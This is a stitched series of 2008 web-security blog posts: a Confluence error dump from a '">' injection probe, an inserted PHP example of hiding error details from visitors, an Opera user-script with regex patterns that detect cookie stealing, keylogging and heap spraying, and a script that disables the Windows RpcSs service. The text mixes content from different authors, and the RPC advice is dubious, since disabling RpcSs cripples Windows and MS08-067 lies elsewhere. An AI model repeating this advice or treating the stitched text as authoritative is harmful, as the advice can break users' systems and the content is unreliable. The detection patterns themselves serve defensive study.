javax.servlet.forward.query_string queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=
javax.servlet.error.message
javax.servlet.error.exception java.lang.IllegalArgumentException: Invalid search query found in specified search.
os_securityfilter_already_filtered true
com.atlassian.johnson.filters.JohnsonFilter_already_filtered true
__sitemesh__using_stream false
javax.servlet.error.request_uri /confluence/dosearchsite.action
com.atlassian.gzipfilter.GzipFilter_already_filtered true
javax.servlet.error.status_code 500
__sitemesh__filterapplied true
javax.servlet.error.servlet_name action
webwork.valueStack com.opensymphony.xwork.util.OgnlValueStack@e2a5ac
Confluence-Request-Time 1224851735677
loginfilter.already.filtered true
atlassian.core.seraph.original.url /dosearchsite.action?queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=
javax.servlet.jsp.jspException java.lang.IllegalArgumentException: Invalid search query found in specified search.
sessioninview.FILTERED true

Parameters (Limited subset)

queryString "> ">
contributorUsername
type
where conf_all
lastModified
contributor ">

Confluence User

anonymous

^ Oops, besides this hideous blob of intelligence it also lets us modify the SQL query. Finally something really interesting to discuss at those cocktail parties, or is it?
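What the error page above hands to an anonymous visitor (stack trace, product and database versions, kernel, JVM) is the part a defender can fix regardless of the search bug. As an added example, not Confluence's or the post's code, the PHP below shows the usual split: full details go to the server log under a random incident id, and the visitor gets only a generic message plus that id. The log destination, the page text and the stand-in search function are placeholders.

```php
<?php
// Added example, not Confluence's or the post's code. Uncaught exceptions are
// logged in full under a random incident id; the client sees only the id.

function incidentId(): string {
    // Random, so ids cannot be guessed or enumerated from one another.
    return bin2hex(random_bytes(8));
}

function splitErrorReport(Throwable $e, array $serverFacts): array {
    // Returns [what the visitor sees, what the log receives].
    $id = incidentId();
    $forUser = [
        'status'  => 500,
        'message' => 'A system error has occurred. Quote incident ' . $id . ' when reporting it.',
    ];
    $forLog = [
        'incident' => $id,
        'type'     => get_class($e),
        'message'  => $e->getMessage(),
        'trace'    => $e->getTraceAsString(),
        'server'   => $serverFacts, // versions, OS, etc.: never sent to the client
    ];
    return [$forUser, $forLog];
}

function handleUncaught(Throwable $e): void {
    [$forUser, $forLog] = splitErrorReport($e, [
        'app_version' => 'PLACEHOLDER-VERSION',
        'php'         => PHP_VERSION,
        'os'          => php_uname(),
    ]);
    error_log(json_encode($forLog));          // server log only
    http_response_code($forUser['status']);
    header('Content-Type: text/plain; charset=utf-8');
    echo $forUser['message'], PHP_EOL;        // generic text + id for the visitor
}

// display_errors is PHP's equivalent of the verbose page above: keep it off,
// keep log_errors on, and route everything uncaught through the handler.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
set_exception_handler('handleUncaught');

// Constructed trigger: a search layer that rejects an unparsable query, as the
// Confluence search did. The visitor sees one generic line and the incident id.
function runSearch(string $query): array {
    if (strpos($query, '"') !== false) {
        throw new InvalidArgumentException('Invalid search query: ' . $query);
    }
    return [];
}
runSearch('">');
```

The incident id is the link between the visitor's report and the log entry; it carries no information about the server by itself, so it is safe to show.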

[1] https://www.securecoding.cert.org/confluence/display/seccode/CERT+Secure+Coding+Standards
source: OWASP News

The RPC Worm Victim List.

Saturday, October 25th, 2008 | Web Security | Comments Off

Opera Arioso Update.

Saturday, October 25th, 2008 | Web Security | Comments Off

I've made some updates to my Opera plugin to block and protect against more attacks on Opera. Luckily there aren't that many attacks in comparison to other browsers; nonetheless I like to notice what happens on web pages I visit. The minor updates are based upon Gareth Heyes' Unicode loop circumvention for Arioso's active heap-spraying and buffer overflow detection, setPreference, and stricter opera: scheme blocking based upon Aviv Raff's, Stefano Di Paola's and Roberto Suggi Liverani's new proofs of concept. Arioso already protected against the proofs of concept on hyperlinks, but lacked additional heuristics on sources. Please note that Arioso does not block JavaScript; instead it analyzes a document and its JavaScript and, based on attack heuristics, determines whether to block the scripts from executing before the page has a chance to load them. Arioso also detects attacks against Internet Explorer and Firefox; while these do not affect Opera, it's always nice to know that the page in question tries to execute an attack against you. One key feature of Arioso is the possibility of using Opera with a very strict same origin policy; this is and was enabled by default, and denies any cross-context sourcing of JavaScript files. This means that any script content loaded from another context than the one you are in will be blocked by default.

You can download the new version of Arioso here: http://www.0x000000.com/arioso.js

The Arioso source can be loaded into Opera. To enable user JavaScript, use Tools > Preferences > Advanced > Content > JavaScript options, and select the directory where you will put your User JavaScript files. Opera will load all files in the specified directory whose names end with .js and will use them as User JavaScript files. Use Opera with Arioso, and you'll be more secure than any other browser available right now.

(function(opera){

/*

 ~~~ Opera Arioso! ~~~  Active browser vulnerability detection & protection by rvdh, 0x000000.com

 $revisions$ update: 20/7/2008: 7:15 PM, keylog pattern adjusted. update: 22/10/2008: 23:00 PM, unicode loop detection.  update: 23/10/2008: 4:19 PM, blocks opera:* on sources, blocks intranet access. credits: Rvdh, Gareth Heyes, Roberto Suggi Liverani, Aviv Raff, Stefano Di Paola

*/

// Arioso magic variables: keep the script's own globals out of reach of page scripts
window.opera.defineMagicVariable('arioso_links', function() {}, null);
window.opera.defineMagicVariable('arioso_alert', function() {}, null);

// Set strict same origin policy:
var arioso_strict_sop = true;

// Arioso variables
var arioso_links = document.links;
var arioso_alert = "";
var crlf = ". \r\n";

// Arioso messages
var m1 = 'Unsafe URI hyperlink schemes';
var m2 = 'Denial of service vector';
var m3 = 'Heapspraying or denial of service vector';
var m4 = 'VBInjection';
var m5 = 'Cookie stealing';
var m6 = 'Same origin policy violation';
var m7 = 'Keylogging';
var m8 = 'Script access';
var m9 = 'ActiveX access';
var m10 = 'Java access';
var m11 = 'Http response splitting';
var m12 = 'Preference hijacking';

// Arioso patterns (each pN pairs with message mN)
var p1 = /^(chrome|file|opera|res|data|telnet|about|resource|view-source|acrobat|localhost|loopback|127\.|192\.)\s*(:|\.)/gim;
var p2 = /for\s*\(\s*.*([a-z]|[0-9])\s*\=\s*.*([a-z]|[0-9])\s*;\s*.*([a-z]|[0-9])\s*(<|>|<=|>=|<==|>==)\s*[0-9]{3,}\s*;\s*/gim;
var p3 = /(while|for|space|block|memory).*unescape\(("|')(%[0-9]|\\x|\\u)([a-z]|[0-9])("|')\)/gim;
var p4 = /String\(\s*.*([a-z]|[0-9]){6,},\s*"[a-z]"\)/gim;
var p5 = /(http|https):\/\/.*\?.*=.*(\+|concat|join).*document\.(cookie|domain)/gim;
var p6 = /(src|href|location|data|classid|codebase|open)\s*(=|\().*(chrome|file|opera|res|data|telnet|about|resource|view-source|acrobat|localhost|loopback|127\.|192\.)\s*(:|\.)/gim;
var p7 = /(\.keyCode|\.keypress|(e|event)\.charCode)/gim;
var p8 = /(bad_arioso_schemes|arioso_links|arioso_schemes|arioso_sanitize_xss)/gim;
var p9 = /(ActiveXObject\(("|').*Shell("|')\)|HKEY\_)/gim;
var p10 = /(java\.(sun|awt)|packages\.(.*)(plugin|javascript))/gim;
var p11 = /open\(("|')\s*(GET|TRACE|POST)\s*("|').*(\\r|\\r\\n|\\n|(%[0-9]|\\x|\\u)([a-z]|[0-9])).*\)/gim;
var p12 = /.*opera\.setPreference.*/gim;

// strict same origin policy detection: block external scripts whose src does
// not contain the current document location (or has no src to check at all)
if (arioso_strict_sop == true) {
    window.opera.addEventListener('BeforeExternalScript', function(e) {
        var src = e.element.getAttribute('src');
        if (!src || !src.match(document.location)) { e.preventDefault(); }
    }, false);
}

// Arioso link enumerator detecting bad uri schemes
window.addEventListener('DOMContentLoaded', function(e) {
    for (var i = 0; i < arioso_links.length; i++) {
        var entity = arioso_links[i].toString();
        if (entity.match(p1)) { arioso_alert += m1 + crlf; }
    }
}, false);

// Inline script inspection: a matching pattern records its message and
// prevents the script from running
var arioso_checks = [
    [p2, m2], [p3, m3], [p4, m4], [p5, m5], [p6, m6], [p7, m7],
    [p8, m8], [p9, m9], [p10, m10], [p11, m11], [p12, m12]
];
window.opera.addEventListener('BeforeScript', function(e) {
    var text = e.element.text;
    for (var j = 0; j < arioso_checks.length; j++) {
        if (text.match(arioso_checks[j][0])) {
            arioso_alert += arioso_checks[j][1] + crlf;
            e.preventDefault();
        }
    }
}, false);

// Show a fixed banner listing everything that was blocked on this page
document.addEventListener('load', function(e) {
    if (arioso_alert != '') {
        var ary = document.createElement('div');
        ary.style.position = 'fixed';
        ary.style.top = '0px';
        ary.style.left = '0px';
        ary.style.width = '100%';
        ary.style.opacity = '.90';
        ary.style.filter = 'alpha(opacity=90)';
        ary.style.border = '1px dotted #f30';
        ary.style.padding = '3px';
        ary.style.font = '8pt sans-serif';
        ary.style.backgroundColor = '#f00';
        ary.style.color = '#fff';
        ary.appendChild(document.createTextNode('ARIOSO BLOCKED: ' + arioso_alert));
        document.body.appendChild(ary);
    }
}, false);

})(window.opera);

source: OWASP News

Disable RPC.

Saturday, October 25th, 2008 | Web Security | Comments Off

There is some fuss about RPC on Windows platforms.[1] As usual, I recommend temporarily disabling RPC from starting when Windows boots. RPC is nasty, and yet again a severe flaw has been found that attackers can abuse to take over a remote PC, and it doesn't require user interaction. An attacker can just send an RPC request remotely and take over your PC, including but not limited to using it to spread worms. It's highly recommended that you temporarily turn RPC off if you haven't already done so. I wrote a small script that can do it for you in Internet Explorer, if you trust me of course! If you haven't got Internet Explorer you can do it manually as well.

Save the script as HTML and run it from your desktop or intranet.

<script language="JavaScript">

// Start value 4 = Disabled (3 = Manual, 2 = Automatic)
var HKEY = "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\RpcSs\\Start";

function lockdownRPC() {
    try {
        var keylock = new ActiveXObject("WScript.Shell");
        // written explicitly as REG_DWORD, the type the Start value must have
        keylock.RegWrite(HKEY, 0x00000004, "REG_DWORD");
        alert('RPC start value set to: 0x00000004, Run > services.msc > RPC and change the startup type to manually or disabled.');
        keylock.Run("CMD /c services.msc");
    } catch (e) {
        alert('Key could not be altered, do it manually please.');
    }
}
</script>

<input type="button" value="Turn off RPC" onclick="lockdownRPC()">

Be cautious when working with RPC: the above script disables RPC, which is something Windows normally does not allow. It is possible that some programs stop working after booting, so it is advised to set RPC to Manual in services.msc after running the script that unlocks the registry. If you want to roll back, just run the script again and enable RPC again.

[1] http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
source: OWASP News